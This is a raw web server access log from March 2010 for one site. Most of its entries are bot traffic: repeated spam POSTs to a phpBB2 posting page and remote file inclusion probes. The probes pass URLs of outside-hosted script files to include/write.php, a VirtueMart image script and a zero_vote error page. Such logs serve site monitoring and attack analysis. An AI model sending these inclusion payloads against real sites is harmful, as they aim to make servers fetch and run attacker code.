94.102.63.11 - - [11/Mar/2010:16:43:35 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:43:49 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:53 -0800] "GET /include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:53 -0800] "GET /logs//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:53 -0800] "GET /logs/showfile.php/access.log//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:43:53 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:53 -0800] "GET /logs/showfile.php//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:44:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:44:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:44:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:44:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:44:54 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.90.164.110 - - [11/Mar/2010:16:45:01 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:45:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:45:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
209.235.254.107 - - [11/Mar/2010:16:45:19 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:45:31 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:38 -0800] "GET /logs/showfile.php//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:38 -0800] "GET /logs//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:38 -0800] "GET /include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:39 -0800] "GET /logs/showfile.php/access.log//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:45:44 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:52 -0800] "GET /logs//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:53 -0800] "GET /logs/showfile.php/access.log//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:53 -0800] "GET /logs/showfile.php//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.180.124.146 - - [11/Mar/2010:16:45:55 -0800] "GET /include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:45:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:46:15 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:46:15 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:46:35 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:46:51 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:46:55 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.39.140.138 - - [11/Mar/2010:16:47:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:47:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:47:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
58.61.164.140 - - [11/Mar/2010:16:47:25 -0800] "GET / HTTP/1.1" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:47:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
58.61.164.140 - - [11/Mar/2010:16:47:42 -0800] "GET /nav.php HTTP/1.1" 200 4763 "http://webmaster-showcase.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "webmaster-showcase.net"
58.61.164.140 - - [11/Mar/2010:16:47:43 -0800] "GET /main.php HTTP/1.1" 200 5366 "http://webmaster-showcase.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:47:50 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:47:56 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 607 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:05 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 613 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:06 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:06 -0800] "GET /logs/showfile.php/access_100212.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:48:14 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:48:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
69.20.70.31 - - [11/Mar/2010:16:48:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:48:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:48:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:52 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 617 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 611 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:52 -0800] "GET /logs/showfile.php/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:48:52 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:48:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.17.253.220 - - [11/Mar/2010:16:49:04 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:49:12 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:49:17 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:49:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:49:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:49:59 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:50:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
67.86.111.140 - - [11/Mar/2010:16:50:25 -0800] "GET /yahoo/perl.php?d=/usr/lib/perl5/5.6.1 HTTP/1.1" 200 3187 "http://help.yahoo.com/l/us/yahoo/smallbusiness/webhosting/perl/perl-21.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.0 Safari/532.8" "webmaster-showcase.net"
67.86.111.140 - - [11/Mar/2010:16:50:26 -0800] "GET /favicon.ico HTTP/1.1" 404 568 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.0 Safari/532.8" "webmaster-showcase.net"
67.86.111.140 - - [11/Mar/2010:16:50:29 -0800] "GET /yahoo/perl.php?d=/usr/lib/perl5/5.8.7 HTTP/1.1" 200 3187 "http://webmaster-showcase.net/yahoo/perl.php?d=/usr/lib/perl5/5.6.1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.0 Safari/532.8" "webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:50:29 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
67.86.111.140 - - [11/Mar/2010:16:50:30 -0800] "GET /favicon.ico HTTP/1.1" 404 568 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.0 Safari/532.8" "webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:50:50 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:50:53 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:50:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 613 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:50:58 -0800] "GET /logs/showfile.php/access_100212.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:50:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 607 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:50:58 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:50:58 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:51:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 611 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:51:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 404 617 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:51:13 -0800] "GET /logs/showfile.php/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
87.106.132.3 - - [11/Mar/2010:16:51:13 -0800] "GET /logs/showfile.php//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:51:24 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:51:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:51:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:51:55 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
208.109.21.238 - - [11/Mar/2010:16:52:02 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:52:07 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:52:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:52:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:52:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:52:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:52:58 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:53:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:53:33 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
212.95.226.66 - - [11/Mar/2010:16:53:37 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:53:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:53:51 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:54:10 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:54:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:54:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:16:54:37 -0800] "GET /skin/zero_vote/error.php?dir=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:16:54:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:16:54:37 -0800] "GET /logs/showfile.php//skin/zero_vote/error.php?dir=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:16:54:37 -0800] "GET /logs/showfile.php/access_100224.log//skin/zero_vote/error.php?dir=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:54:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
125.160.17.201 - - [11/Mar/2010:16:54:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 607 "-" "Mozilla/5.0" "webmaster-showcase.net"
125.160.17.201 - - [11/Mar/2010:16:54:50 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 613 "-" "Mozilla/5.0" "webmaster-showcase.net"
